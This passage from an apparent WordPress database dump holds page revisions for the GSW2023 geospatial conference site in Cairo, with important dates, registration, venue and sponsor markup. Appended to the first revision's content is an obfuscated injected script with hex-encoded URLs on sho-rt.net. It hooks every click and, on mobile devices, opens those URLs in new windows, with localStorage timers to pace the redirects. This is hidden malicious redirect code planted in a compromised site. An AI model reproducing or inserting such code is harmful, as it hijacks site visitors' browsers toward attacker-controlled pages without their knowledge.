src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:36:54','2023-04-16 20:36:54','',3066,'https://gsw2023.com/?p=4059',0,'revision','',0),
(4067,1,'2023-04-19 11:05:43','2023-04-19 11:05:43','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" 